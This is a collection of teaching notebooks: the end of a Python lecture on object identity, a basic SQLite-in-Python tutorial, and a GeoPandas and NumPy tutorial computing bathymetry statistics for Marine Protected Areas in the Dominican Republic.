# + colab={"base_uri": "https://localhost:8080/", "height": 34} executionInfo={"elapsed": 218, "status": "ok", "timestamp": 1573604067134, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AAuE7mBMnWy8dDR7jyTHNy9tPaRx6DCyA3QKrIcuQ7R4=s64", "userId": "06399644931392855882"}, "user_tz": 480} id="QHgoxbZacbA0" outputId="88ec70d1-baf0-4dc3-e9a8-d5b97d9bacfc" slideshow={"slide_type": "fragment"}
# Now x neither 'is' or is 'equal to' y
x == y or x is y
# + id="FbPa8yo8ckPO" slideshow={"slide_type": "subslide"}
# But there is nothing stopping you making multiple references
# to the same list
x = [ 1 ]
y = x
x == y # Yep, true.
# + id="LgVluFpgcs61" slideshow={"slide_type": "fragment"}
x is y # Yep, also true.
y.append(2)
print(x)
# + [markdown] id="Y1jmDmUhcxyn" slideshow={"slide_type": "fragment"}
# The take home here:
# * == is for equivalence
# * 'is' is for testing if references point to the same thing in memory
# + [markdown] id="KZP9y5sgyVm8" slideshow={"slide_type": "slide"}
# # Reading
#
# * Open book Chapter 15: http://openbookproject.net/thinkcs/python/english3e/classes_and_objects_I.html
#
# * Open book Chapter 16:
# http://openbookproject.net/thinkcs/python/english3e/classes_and_objects_II.html
#
# # Homework
#
# * Go to Canvas and complete the lecture quiz, which involves completing each challenge problem
# * ZyBook Reading 12
#
|
lecture_notebooks/L12 Classes and Objects.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Table creation and Insert opertaion.
#example to create a table and insertion with sql.
import sqlite3
conn = sqlite3.connect('myTable.db')
cursor = conn.cursor()
sql_command = """CREATE TABLE emp(
staff_number INTEGER PRIMARY KEY,
fname VARCHAR(30),
lname VARCHAR(20),
gender CHAR(1),
joining DATE)"""
cursor.execute(sql_command)
sql_command = """INSERT INTO emp VALUES(18, 'Virat', 'Kohli', 'M', '1989-11-5')"""
cursor.execute(sql_command)
sql_command = """INSERT INTO emp VALUES(17, 'ABde', 'Villiares', 'M', '1985-17-2')"""
cursor.execute(sql_command)
conn.commit()
conn.close()
#example to demonstrate SQL to fetch data.
import sqlite3
conn = sqlite3.connect('myTable.db')
cursor = conn.cursor()
cursor.execute('SELECT*FROM emp')
ans = cursor.fetchall()
for i in ans:
print(i)
# # Update and Delete Operation.
#example for updating the table.
import sqlite3
conn = sqlite3.connect('myTable.db')
conn.execute("UPDATE emp SET fname = 'Sachin'")
conn.commit()
print(conn.total_changes)
cursor = conn.execute('SELECT*FROM emp')
for i in cursor:
print(i)
conn.close()
#example for delete operation.
import sqlite3
conn = sqlite3.connect('myTable.db')
conn.execute("DELETE from emp")
print(conn.total_changes)
conn.commit()
cursor = conn.execute('SELECT*FROM emp')
for i in cursor:
print(i)
conn.close()
# +
# code for executing query using input data
import sqlite3
con = sqlite3.connect(":memory:")
cur = con.cursor()
cur.execute("create table person (name, age, id)")
print ("Enter 5 students names:")
who = [input() for i in range(5)]
print ("Enter their ages respectively:")
age = [int(input()) for i in range(5)]
print ("Enter their ids respectively:")
p_id = [int(input()) for i in range(5)]
n = len(who)
for i in range(n):
cur.execute("insert into person values (?, ?, ?)", (who[i], age[i], p_id[i]))
cur.execute("select * from person")
print(cur.fetchall())
# -
#Visualizing the data.
import matplotlib.pyplot as plt
def pl(p_id, age):
plt.scatter(p_id, age, color = 'blue', marker = '*')
plt.xlabel('Persons ID')
plt.ylabel('Age')
plt.title('Scatter Plot')
plt.show()
print('Enter 5 students name:')
who = [input for _ in range(5)]
print('Enter the respective Age:')
age = [int(input()) for i in range(5)]
print('Enter ids:')
p_id = [int(input()) for j in range(5)]
pl(p_id, age)
# # Handling Large Data
# +
import sqlite3
# Connection with the DataBase
# 'library.db'
connection = sqlite3.connect("library.db")
cursor = connection.cursor()
# SQL piece of code Executed
# SQL piece of code Executed
cursor.executescript("""
CREATE TABLE peoplesSSSSS(
firstname,
lastname,
age
);
CREATE TABLE booksSSSS(
title,
author,
published
);
INSERT INTO
booksSSSS(title, author, published)
VALUES (
'<NAME>''s GFG Detective Agency',
'<NAME>',
1987
);
""")
sql = """
SELECT COUNT(*) FROM booksSSSS;"""
cursor.execute(sql)
# The output in fetched and returned
# as a List by fetchall()
result = cursor.fetchall()
print(result)
sql = """
SELECT * FROM booksSSSS;"""
cursor.execute(sql)
result = cursor.fetchall()
print(result)
# Changes saved into database
connection.commit()
# Connection closed(broken)
# with DataBase
connection.close()
# -
#example to demonstrate the use of executemany().
import sqlite3
conn = sqlite3.connect('library.db')
cursor = conn.cursor()
cursor.execute(
"""CREATE TABLE booksSS(
title,
author,
published);
""")
li = [['A', 'B', 2013], ['C', 'D', 2014], ['E', 'F', 2015]]
conn.executemany("""
INSERT INTO
booksSS(title, author, published)
VALUES (?, ?, ?)""", li)
sql = """
SELECT * FROM booksSS;"""
cursor.execute(sql)
result = cursor.fetchall()
for _ in result:
print(_)
conn.commit()
conn.close()
#example.
import sqlite3
conn = sqlite3.connect('Company.db')
cursor = conn.cursor()
sql = """CREATE TABLE employeeee(
id INTEGER PRIMARY KEY,
firstname VARCHAR(30),
lastname VARCHAR(20),
gender CHAR(1),
dob DATE)"""
cursor.execute(sql)
sql = """INSERT INTO employeeee VALUES('1', 'Virat', 'Kohli', 'M', '1989-11-5')"""
cursor.execute(sql)
li = [['3', 'Kane', 'Williamson', 'M', '1986-4-4'],
['2', 'ABde', 'Villiares', 'M', '1985-17-2'],
['4', 'MS', 'Dhoni', 'M', '1981-7-7']]
conn.executemany(
"""INSERT INTO employeeee VALUES (?, ?, ?, ?, ?)""", li)
print('method-1\n')
for _ in conn.execute('SELECT * FROM employeeee ORDER BY ID'):
print(_)
print('method-2\n')
sql = """SELECT * FROM employeeee ORDER BY ID"""
cursor.execute(sql)
ans = cursor.fetchall()
for i in ans:
print(i)
conn.commit()
conn.close()
# # Inserting Variables to Database table using SQL.
# __Steps to Create and Insert variables in database__
#example for creating a database.
import sqlite3
conn = sqlite3.connect('pythonDB.db')
cursor = conn.cursor()
def create_table():
cursor.execute('CREATE TABLE IF NOT EXISTS RecordONE (Number REAL, Name TEXT)')
def data_entry():
number = 1234
name = 'VK'
cursor.execute('INSERT INTO RecordONE (Number, Name) VALUES(?, ?)',(number, name))
conn.commit()
create_table()
data_entry()
cursor.close()
conn.close()
|
SQL with python(Basics).ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 2
# language: python
# name: python2
# ---
# + [markdown] id="S6xi1qinKvA_" colab_type="text"
# ## Session Prep
# + [markdown] id="gSddwN1KC74U" colab_type="text"
# 1. Run the cell below to install two libraries we'll be using to look at geospatial data: GeoPandas and OpticalRS.
# 2. Visit the [Github repo](https://github.com/rrcarlson/Intro_python_geo) and download/clone the files in the Data folder (shapefiles and raster).
# + id="zP7vdH0AK0W3" colab_type="code" colab={}
#@title
# Install OpticalRS. This also installs GeoPandas because GeoPandas is a dependency of OpticalRS
# !apt-get install software-properties-common python-software-properties > /dev/null
# !add-apt-repository ppa:ubuntugis/ppa -y > /dev/null
# !apt-get update > /dev/null
# !apt-get install -y --fix-missing python-gdal gdal-bin libgdal-dev > /dev/null
# !pip2 install OpticalRS > /dev/null
# + [markdown] id="Fl40H7od1mK4" colab_type="text"
# # Intro to Python
# + [markdown] id="cGa0avMm1mK5" colab_type="text"
# 
#
# Python is a rich, versatile language with lots of prolific contributors. So where to start?
#
# For reference, below are some Python tutorials that cover a range of Python libraries. We won't spend too much time today on basic syntax, etc., since that's well covered elsewhere and kinda boring. As a Python newbie, I've found that using Pandas/GeoPandas and NumPy have introduced me organically to other libraries, and have allowed me to see results quickly for basic geospatial tasks--so we'll start there!
# * [Python basics](https://github.com/sinkovit/PythonSeries/blob/master/Python%20basics.ipynb): How to create lists, dictionaries, iterators, etc.
# * [Python Markdown and LaTex](https://github.com/adam-p/markdown-here/wiki/Markdown-Cheatsheet): Documentation and formatting
# * Matplotlib: Data visualization
# * [Pandas](https://pandas.pydata.org/pandas-docs/stable/10min.html): Data wrangling and preparation using two types of data objects: 1) DataFrames, 2) Series.
# * [GeoPandas](https://automating-gis-processes.github.io/2016/Lesson2-overview-pandas-geopandas.html): Basically the geospatial version of Pandas. Adds geospatial functionality to the DataFrame (Geo + DataFrame = GeoDataFrame).
# * [NumPy](https://www.datacamp.com/community/tutorials/python-numpy-tutorial): Multi-dimensional data arrays for manipulating large datasets. There are some functions for linear algebra and statistics within NumPy but it's also used by SciPy, matplotlib, and pandas for scientific computing.
# * [SciPy](http://www.randalolson.com/2012/08/06/statistical-analysis-made-easy-in-python/): Scientific computing and statistical analysis. Uses NumPy, Matplotlib, and Pandas, and is common in earth sciences, astronomy, and oceanography.
# * [Shapely](http://toblerity.org/shapely/manual.html): Spatial data model for planar features (points, curves, and surfaces).
# * Skikit-learn: regression, clustering, and classification algorithms
# * Various [cool tricks](https://community.modeanalytics.com/python/)
# + [markdown] id="kH0cCmSd1mK5" colab_type="text"
# # Conservation in the Dominican Republic
# + [markdown] id="vTbdGoGL1mK6" colab_type="text"
# 
#
# In this tutorial, we'll be testing out two Python libraries, **GeoPandas** and **NumPy**, that are useful in GIS. Our objectives: to filter and analyze vector and raster data for conservation areas in the Dominican Republic.
#
# We'll use two datasets:
# * **Conservation Areas of the Dominican Republic**: Vector data delineating conservation area boundaries, from the [World Database of Protected Areas (WDPA)](https://www.iucn.org/theme/protected-areas/our-work/world-database-protected-areas).
# * **Gridded Bathymetric Data**: Raster data (30 arc-second resolution) on bathymetry from the [British Oceanographic Data Center](https://www.bodc.ac.uk/).
#
# Our goals are:
# * **Filter the WDPA database** to find only conservation areas for the marine environment (Marine Protected Areas)
# * **Clip rasters** to MPA boundaries
# * **Analyze raster data** (bathymetry) within Marine Protected Area boundaries to find
# * Mean depth per MPA
# * Standard deviation of depth per MPA
# * Range of depth per MPA
# + [markdown] id="OG90pHk51mK6" colab_type="text"
# # Step 1: Load your libraries
# + [markdown] id="uU77Mqop1mK7" colab_type="text"
# What modules do we need?
# * Vector data comes in a tabular format, with one geometric feature per row. So we need a library to organize geographic data in a DataFrame.
# **That's Pandas** (more specifically, **GeoPandas**).
# * Raster data is a little trickier. It comes to us in a grid of pixel values, sometimes in multiple bands (3+ dimensions). We need a library to organize arrays/matrices of values in *n* dimensions. **That's NumPy**.
# * Numpy isn't explicitly designed to handle raster data. We need the help of another library to convert our raster files into array format. **That's [OpticalRS](https://github.com/jkibele/OpticalRS)**, created by NCEAS' very own <NAME>! OpticalRS borrows a bit of code from [an old version of rasterstats](https://github.com/perrygeo/python-rasterstats/releases/tag/0.5) to do the actual raster subsetting.
# * We'll want to plot stuff, so we need a library for data visualization. That's **matplotlib**.
#
# 
# + id="20rpNBAb1mK8" colab_type="code" colab={}
import geopandas as gpd
import pandas as pd
import numpy as np
import matplotlib
from OpticalRS import *
# + [markdown] id="8J29u-kf1mK_" colab_type="text"
# # Step 2: Prep your vector data
# + [markdown] id="nJRFiGhI1mK_" colab_type="text"
# ## Step 2.1 Read in your vector data: GeoPandas
# + [markdown] id="nyCloPks1mLA" colab_type="text"
# Reading in tabular data is pretty simple. Just remember:
# * DataFrame = Pandas = `pd.read_csv()`
# * GeoDataFrame = DataFrame with geometry attribute = GeoPandas = `gpd.read_file()`
# + id="ytyKh93J4cR3" colab_type="code" colab={}
# Loading my local files into Colaboratory
from google.colab import files
uploaded = files.upload()
# + id="6lZggwYl1mLB" colab_type="code" colab={}
# Define your vector filepath
conserve_fp = "WDPA_polygons.shp"
# Read vector data in as GeoDataFrame
conserve = gpd.read_file(conserve_fp)
# + [markdown] id="qiWCmE0T1mLD" colab_type="text"
# Our first preprocessing step is to check on the data's projection. Projections can be tricky and I'm not going to delve too far into this topic here, but below are some basic steps for identifying and changing your data's projection (more details can be found [here](http://geopandas.org/projections.html)).
# + id="D3IQ6kAJ1mLD" colab_type="code" colab={}
# Check the Coordinate Reference System (CRS)
conserve.crs
# + id="j8m5oyP-1mLL" colab_type="code" colab={}
# Change your CRS, for fun. Then change it back (because we like EPSG = 4326).
conserve = conserve.to_crs(epsg=3857)
conserve = conserve.to_crs(epsg=4326)
# + [markdown] id="F82jApzI1mLO" colab_type="text"
# ### Exercise 2.1
# + id="4luBoD9C1mLO" colab_type="code" colab={}
# Read in your WDPA shapefile as a GeoDataFrame.
# Check the projection of your data.
# + [markdown] id="fD5yzPop1mLQ" colab_type="text"
# ## Step 2.2 Explore your vector data: GeoPandas
# + [markdown] id="sn6Xos8T1mLS" colab_type="text"
# We can use some basic exploratory functions in GeoPandas to query our data.
# + id="WKdLg7jhjAbU" colab_type="code" colab={}
# Look at the first few features in our attribute table
conserve.head()
# + id="zeCs2GRG1mLT" colab_type="code" colab={}
# Look at all of the attributes in your dataset
conserve.info()
# + [markdown] id="tkiCTJZf1mLX" colab_type="text"
# There are 143 data objects with 29 attributes, of various data types (object, float, integer). In the pandas world, data types break down like this:
# * dtype('O') = object = can include string and other geopandas object types
# * dtype('int64') = integer
# * dtype('float64') = float
# + id="u3qTTUvU1mLY" colab_type="code" colab={}
# What is the total conserved area in the DR? Conserved area = "GIS_AREA" (we'll discuss how to use the inherent geometry of the GeoDataFrame to do this later).
area_sum = conserve.GIS_AREA.sum()
area_sum
# + id="GNZyFN0X1mLc" colab_type="code" colab={}
# What is the largest area conserved?
area_max = conserve.GIS_AREA.max()
area_max
# + id="EhTlDpWb1mLf" colab_type="code" colab={}
# What is the smallest area conserved?
area_min = conserve.GIS_AREA.min()
area_min
# + id="eWbK-61m1mLj" colab_type="code" colab={}
# What are the unique values for the "MARINE" attribute?
conserve['MARINE'].unique()
# + id="FqKSPaqu1mLn" colab_type="code" colab={}
# How many different areas are "Marine" (2), "Terrestrial" (0), or both (1)?
type_park = conserve['MARINE'].value_counts()
type_park
# + id="DzWE-9Ky1mLq" colab_type="code" colab={}
# Write all of this info into a string
"The total conserved area is {} square meters and there are {} MPAs, {} terrestrial areas, and {} mixed areas".format(area_sum, type_park["2"], type_park["0"], type_park["1"])
# + [markdown] id="9zV-u_cC1mLs" colab_type="text"
# ### Exercise 2.2
# + id="EyfTJmGV1mLt" colab_type="code" colab={}
# What are the options for park designation in English ("DESIG_ENG")?
# + id="sK7E6rjZ1mLv" colab_type="code" colab={}
# How many different areas are designated as "Wildlife Refuge"?
# + [markdown] id="o2QqMb171mLz" colab_type="text"
# For a complete list of methods available for exploring GeoDataFrames, see [here](https://pandas.pydata.org/pandas-docs/stable/generated/pandas.DataFrame.html).
# + [markdown] id="qjl7rkUL1mL0" colab_type="text"
# ## Step 2.3 Plot your vector data: GeoPandas
# + [markdown] id="-4UoYzZn1mL0" colab_type="text"
# GeoPandas offers some basic plotting methods for quick visualization. You can create more advanced plots (with customizable layering, formatting) using the Matplotlib library. Matplotlib can be a bit confusing at first, so here's a [great tutorial](https://github.com/matplotlib/AnatomyOfMatplotlib/blob/master/AnatomyOfMatplotlib-Part1-Figures_Subplots_and_layouts.ipynb) if you want to learn more. As in R, you can also create interactive maps through [Leaflet](https://automating-gis-processes.github.io/2016/Lesson5-interactive-map-folium.html) and [Bokeh](https://automating-gis-processes.github.io/2016/Lesson5-interactive-map-bokeh.html).
# + id="gSHZDyO81mL1" colab_type="code" colab={}
# Plot conservation areas
conserve.plot()
# + id="nQGfTSlV1mL3" colab_type="code" colab={}
# Plot conservation areas as choropleth by park type
conserve.plot(column = "DESIG_ENG", cmap = "Paired")
# + id="G6nX3UmE1mL5" colab_type="code" colab={}
# Make it red! Color palettes: https://matplotlib.org/users/colormaps.html
conserve.plot(column = "DESIG_ENG", cmap = "hot")
# + id="itP1yj0r1mL7" colab_type="code" colab={}
# Plot conservation areas where the area has a Use Management Plan.
conserve[conserve['MANG_PLAN'] != "No"].plot()
# + [markdown] id="wz7HOiZP1mL_" colab_type="text"
# ### Exercise 2.3
# + id="9g8pH6vZ1mL_" colab_type="code" colab={}
# Plot conservation areas as a choropleth by the "MARINE" attribute
conserve.plot(column = "MARINE")
# + id="_HjXmxEf1mMB" colab_type="code" colab={}
# Make it blue (obviously)! https://matplotlib.org/users/colormaps.html
conserve.plot(column = 'MARINE', cmap="Blues")
# + [markdown] id="DVjnH-z71mMD" colab_type="text"
# ## Step 2.4 Filter your vector data: GeoPandas
# + [markdown] id="sToRQcBk1mME" colab_type="text"
# **Looking above at our "To Do" list, our first task was this:** "Filter the WDPA database to find only conservation areas for the marine environment (Marine Protected Areas)."
#
# In R-speak, we're using Python to `dplyr::filter`. To subset data in Python, we use the `loc` and `iloc` indexing tools. Documentation can be found [here](http://pandas.pydata.org/pandas-docs/version/0.17/indexing.html) under "Indexing and Selecting Data" (basically the Python version of R's Data Wrangling cheat sheet).
#
# The basics are this:
# * `iloc` selects data on a known index (integer value). Example: `iris.iloc[7]` would select the 8th row of data.
# * `loc` selects data on a known label. Example `iris.loc['sepal_length'>7]` selects data with sepal length over 7 centimeters.
#
# Let's try it out:
# + id="RAWvIK6O1mME" colab_type="code" colab={}
# Take a look at our first few lines of data
conserve.head(3)
# + id="U2j4WUyq1mMH" colab_type="code" colab={}
# Select rows 0 through 2, column 4
conserve.iloc[0:3, 3]
# + id="11muwsJe1mMJ" colab_type="code" colab={}
# Select index value 3 THROUGH 6 for name and metadata ID
conserve.loc[3:6, ['NAME','METADATAID']]
# + id="5Say35Et1mMK" colab_type="code" colab={}
# Select indices 3 AND 6 for name and metadata ID
conserve.loc[[3,6], ['NAME','METADATAID']]
# + id="2UxUi_fA1mMN" colab_type="code" colab={}
# Filter DataFrame for only those areas with the name "Jaragua"
conserve.loc[conserve['NAME'] == "Jaragua"]
# + [markdown] id="tjw_VO0H1mMO" colab_type="text"
# The WDPA Data Dictionary that Marine Protected Areas are coded by the ordinal `MARINE` attribute, defined as follows:
# * 0 = 100% terrestrial PA
# * 1 = Coastal: marine and terrestrial PA
# * 2 = 100 % marine PA
#
# Let's subset our data by *only* those rows that represent 100% MPAs.
# + id="gRHgeUtc1mMP" colab_type="code" colab={}
# Select only 100% marine protected areas
mpa = conserve.loc[conserve['MARINE'] == '2']
len(mpa)
# + id="0IduLWU-1mMR" colab_type="code" colab={}
mpa[['MARINE', 'NAME']]
# + [markdown] id="5b6roE2-1mMT" colab_type="text"
# Our resulting DataFrame contains vector data for 7 MPAs in the Dominican Republic.
# + [markdown] id="WsT9hcld1mMT" colab_type="text"
# ## Before we move on...
# + [markdown] id="5ioV6gzT1mMT" colab_type="text"
# **Can you "pipe" in Python?** Yes and no. You won't see any "%>%" business in Python, but Python syntax allows you to string together multiple operations. The Python mantra is that "everything is an object", meaning everything (strings, dataframes, lists, functions, even modules) can be assigned to a variable or passed as an argument to a function.
#
# Confusing? Take a look at our code above. We're running multiple operations through our "conserve" geodataframe, like: 1) reprojecting it, 2) filtering it, and 3) plotting it. In R, "piping" might look something like:
# + [markdown] id="aw07fuqg1mMU" colab_type="text"
# `conserve %>%`
# > `st_transform(4326) %>%`
#
# > `dplyr::filter(MARINE == "2") %>%`
#
# > `dplyr::select(MARINE, NAME, geometry) %>%`
#
# > `plot()`
#
#
# In Python, "piping" works out like this:
#
#
# `conserve.to_crs(epsg=4326).loc[conserve['MARINE']=='2'][['MARINE','NAME','geometry']].plot()`
#
#
# Since "everything is an object" in Python, the result of each operation can be worked on by subsequent methods. You can see that this line of code simply combines the functions we used in Step 2.2. Let's see if it works.
# + id="KruGAyTGwEGj" colab_type="code" colab={}
conserve.to_crs(epsg=4326).loc[conserve['MARINE'] == '2'][['MARINE','GIS_AREA','geometry']].plot()
# + [markdown] id="xtKTG_Jd1mMZ" colab_type="text"
# Woohoo!
# + [markdown] id="wOsgN1Ju1mMa" colab_type="text"
# ## Also before we move on...
# + [markdown] id="Bc1bG_f61mMa" colab_type="text"
# **You can also perform call kinds of operations using the 'geometry' column (every GeoDataFrame has one).**
# Above, we used the dataset's "GIS_AREA" attribute to run summary statistics. This is because the WDPA dataset uses its own methodology and decision factors for calculating polygon areas. Most datasets won't be this finicky.
#
# The "geometry" column contains a Shapely geometry object (point, polygon, multi-point, multi-polygon, etc.) and is usually automatically detected when GeoPandas reads in your shapefile. But be careful! The geometry column won't always be called "geometry". Use the "name" method to double check. If GeoPandas chooses the wrong column for geometry, use the `set_geometry` method to specify which column to use.
# + id="OLmolzi21mMa" colab_type="code" colab={}
# Call your geometry attribute and find its Shapely geometry type
conserve.geometry.head()
# + id="5ulFxqi91mMf" colab_type="code" colab={}
# Check which column GeoPandas has chosen as the "geometry" attribute
conserve.geometry.name
# + id="cpqmpSog1mMh" colab_type="code" colab={}
# Change if necessary (not necessary in our case, so this code is redundant)
conserve.set_geometry("geometry")
conserve.geometry.name
# + [markdown] id="RxfEIGLS1mMl" colab_type="text"
# # Step 3: Prep your raster data
# + [markdown] id="y3_7oebp1mMl" colab_type="text"
# ## Step 3.1 Read in your raster data: Numpy and OpticalRS
# + [markdown] id="R2G2-U-T1mMm" colab_type="text"
# **Let's turn our attention to our raster data.** One of my favorite parts of Python is its ability to manipulate raster data. By turning a raster into an object called a NumPy array, you can directly access the matrix of values within raster pixels, analyzing and filtering raster data in [all kinds of ways](https://docs.scipy.org/doc/numpy/user/quickstart.html) within the expansive SciPy library. Arrays are also compatible with GeoPandas, so you don't have to worry about converting your vector data into SpatialPolygonsDataFrames (or whatever) to play well with rasters.
#
# To turn our raster file into a numpy array, we'll use a library called OpticalRS by <NAME> found [here](https://github.com/jkibele/OpticalRS).
# + id="rjTmVRzm1mMm" colab_type="code" colab={}
# %pylab inline
from OpticalRS import *
# + [markdown] id="dlqhKmME1mMo" colab_type="text"
# Our first step is to read our raster file into OpticalRS. The `RasterDS()` function reads in a file and converts it into a raster-specific object called a 'Raster Dataset'. The `band_array` attribute of the 'Raster Dataset' is a NumPy array of your data.
# + id="cWwbZMbFWV4y" colab_type="code" colab={}
# Loading my local files into Colaboratory
from google.colab import files
uploaded = files.upload()
# + id="vQ65aL9w1mMp" colab_type="code" colab={}
# Define your GeoTiff filepath
bathy_dr_fp = "bathy_caribb_4326.tif"
# Turn your GeoTiff into a "Raster Dataset" object.
rds = RasterDS(bathy_dr_fp)
# Convert the "Raster Dataset" object into a numpy array
dominican_arr = rds.band_array
# + [markdown] id="y4svnLWkB9mN" colab_type="text"
# If you have lots of rasters to read in at once, define your root directory and run a loop through it
# ```
# in_data_dir = "/home/carlson/tutorial_files/"
# filenames = []
# for p in os.listdir(in_data_dir):
# if p.endswith('.tif'):
# fp = os.path.join(in_data_dir, p)
# filenames.append(fp)
# ```
# + [markdown] id="xEWJnqQ01mMq" colab_type="text"
# Let's check out the properties of our array and make sure the conversion worked
# + id="oCdZ-e3s1mMs" colab_type="code" colab={}
# Check array shape
dominican_arr.shape
# + id="Q7qjBg3J1mMw" colab_type="code" colab={}
# Find mean depth (pixel value) in your raster
dominican_arr.mean()
# + id="PwPeoMPd1mMy" colab_type="code" colab={}
# Check size of array
dominican_arr.nbytes
# + id="pxNxhMMk1mM0" colab_type="code" colab={}
# Create a quick plot
imshow(dominican_arr.squeeze(), cmap ='viridis')
# + [markdown] id="bf8ph22Q1mM6" colab_type="text"
# Looks good!
# + [markdown] id="sASK8U2F1mM6" colab_type="text"
# ### Exercise 3.1
# + id="8YDqXNVC1mM7" colab_type="code" colab={}
# Follow the steps to load in your raster data as a NumPy array.
# + id="F5crs_mS1mM8" colab_type="code" colab={}
# Find the max bathymetry value in your array (use NumPy documentation: https://docs.scipy.org/doc/numpy-1.13.0/reference/routines.statistics.html)
# + [markdown] id="jz6X2zRk1mM9" colab_type="text"
# # Step 4: Analyze bathymetry by MPA ("Zonal Statistics")
# + [markdown] id="ZNBgWire1mM9" colab_type="text"
# ## Step 4.1 Apply bathymetry to one "zone"
# + [markdown] id="O46Q6P901mM-" colab_type="text"
# Running statistics on our array/raster is easy, but not terribly meaningful because my bounding box is pretty arbitrary. We need to clip our raster to MPAs in order to assess the bathymetry values within our "zones" of interest. This is called "zonal statistics" (aka "cookie cutter statistics").
# + [markdown] id="KcEsFu561mM-" colab_type="text"
# 
#
# Let's start by clipping our "Raster Dataset" object to MPA geometries. This is easy in OpticalRS using the `geometry_subset()` function. `geometry_subset` takes a geometry object (like the 'geometry' attribute of a GeoDataFrame row) and uses it as a bounding box (box-ish) for our "Raster Dataset", returning a NumPy array.
#
# Since `geometry_subset` takes just one geometry, we'll
# 1. Dissolve all parks designated as "Marine" into one geometry.
# 2. Use this geometry as the "cookie cutter" for our raster.
# + id="lUviGUg71mM_" colab_type="code" colab={}
# Create one geometry for ALL marine protected areas (Remember: MPAs are coded as '1')
mpas_dissolved = conserve.dissolve(by='MARINE').loc['2']
# Clip your array to the shape of MPAs (dissolved)
mpa_array = rds.geometry_subset(mpas_dissolved.geometry)
# Plot the clipped array
imshow(mpa_array.squeeze())
# + [markdown] id="h12Zw8bo1mNB" colab_type="text"
# Great! Now we have an array of bathymetry values clipped to MPA boundaries. We can use [any statistical methods](https://docs.scipy.org/doc/numpy-1.14.0/reference/index.html) available within NumPy on this array.
# + id="ReS6UPC31mNB" colab_type="code" colab={}
# Find the mean, min, max, and range of bathymetry values for MPAs.
[mpa_array.mean(), mpa_array.min(), mpa_array.max(), mpa_array.ptp()]
# + [markdown] id="whvlEFrB1mND" colab_type="text"
# Let's tighten this up by placing these commands in this same function. **Note:** There are lots of preexisting functions for doing "Raster Stats" in Python and R, but they're prescriptive in the types of statistics they return. By converting your raster into an array, you can apply anything in the **NumPy** universe to your data!
# + id="q9kdCevE1mNE" colab_type="code" colab={}
# Define a function encompassing all of the commands above.
# Clip Raster Dataset to vector object g.
# Find mean, min, max, and range values of clipped numpy array.
# Fetch the MPA ID from "g" and place alongside summary statistics.
def stats_bathy(g, rds):
mpa_arr = rds.geometry_subset(g.geometry)
mean_bathy = mpa_arr.mean()
min_bathy = mpa_arr.min()
max_bathy = mpa_arr.max()
range_bathy = mpa_arr.ptp()
mpa_id = g['WDPA_PID']
return mpa_id, mean_bathy, min_bathy, max_bathy, range_bathy
# + id="jlfa_gQ81mNG" colab_type="code" colab={}
# Try the function on g = mpas_dissolved
stats_bathy(mpas_dissolved, rds)
# + [markdown] id="FJJ5bLgB1mNI" colab_type="text"
# ### Exercise 4.1
# + id="lZ9QyjD31mNI" colab_type="code" colab={}
# Follow the steps above to clip your raster data to MPA boundaries.
# + id="Te55IqNS1mNL" colab_type="code" colab={}
# Define a new function calculating the standard deviation and coefficient of variation of MPA geometries
# + [markdown] id="G48ciIuA1mNM" colab_type="text"
# ## Step 4.2: Apply bathymetry to many "zones"
# + [markdown] id="yVfFHRpz1mNM" colab_type="text"
# Now that our personal "Raster Stats" are bundled neatly in one function, we can iterate through multiple geometries, for example, each individual MPA (undissolved). The easiest way to do this is to use `apply`, which operates like `apply` in R. Our steps are:
#
# * Create an anonymous function using `lambda` and run each geometry (row) in our DataFrame through that function.
# * `apply` basically **points each geometry in our DataFrame** to fill `g` in `stats_bathy(g, rds)`
# + id="qhATIhvN1mNN" colab_type="code" colab={}
# Define a new function that uses 'lambda' to iterate stats_bathy through multiple DataFrame rows (MPA geometries).
def stats_bathy_multiple(dataframe, rds):
series_mpas = dataframe.apply(lambda g: stats_bathy(g, rds), axis=1)
return series_mpas
# + id="Pg1TH5JQ1mNP" colab_type="code" colab={}
# Try out the function on our original 'mpa' GeoDataFrame
series_mpas = stats_bathy_multiple(mpa, rds)
series_mpas
# + [markdown] id="X-Eewgcc1mNQ" colab_type="text"
# We now have summary statistics for all MPAs in our `conserve` dataset!
# + [markdown] id="hftFLbOL1mNQ" colab_type="text"
# ## Extra steps
# + [markdown] id="7vPPh_GD1mNQ" colab_type="text"
# The data above isn't in the most usable format. Our function returns a series of tuples, with each tuple representing a different MPA geometry.
#
# If I want to get all of this back into a DataFrame, I can split each tuple into separate values (attributes). There are several ways to do this, but one easy method is `vstack()`, which splits *thing* into multiple *sub-things* and stacks them vertically to make an array. I can then insert this data into a DataFrame.
# + id="Cdy1gDr01mNR" colab_type="code" colab={}
# Convert your series of tuples into a DataFrame using 'vstack'
dataframe_mpas = pd.DataFrame(np.vstack(series_mpas))
dataframe_mpas
# + id="Ckax55Fx1mNS" colab_type="code" colab={}
# Rename the columns of your DataFrame
dataframe_mpas = dataframe_mpas.rename(columns = {0:'WDPA_PID', 1:'mean_bathy', 2: 'min_bathy', 3: 'max_bathy', 4: 'range_bathy'})
dataframe_mpas
# + [markdown] id="Snkb6CRB1mNU" colab_type="text"
# I can then save this data back out to a CSV. Saving tabular data is as simple as:
# * DataFrame = Pandas = `pd.read_csv()` = `pd.to_csv()`
# * GeoDataFrame = DataFrame with geometry attribute = GeoPandas = `gpd.read_file()` = `gpd.to_file()`
# + id="dThxTHuQ1mNV" colab_type="code" colab={}
# Save DataFrame to CSV
dataframe_mpas.to_csv("python_ecodatascience.csv")
# + [markdown] id="Y5XjVgVU1mNV" colab_type="text"
# # Step 5: Review
# + [markdown] id="U9jteQ171mNX" colab_type="text"
# * **Use Pandas to manage and clean tabular data in a DataFrame**
# * Use `loc` and `iloc` to index/subset data in a DataFrame.
# * Remember to check `dtype`
# * **Use GeoPandas** to do the same for geodata
# * **NumPy is useful for managing data in arrays**, particularly if your data has over 2 dimensions.
# * A few tips for **iterating through DataFrames**:
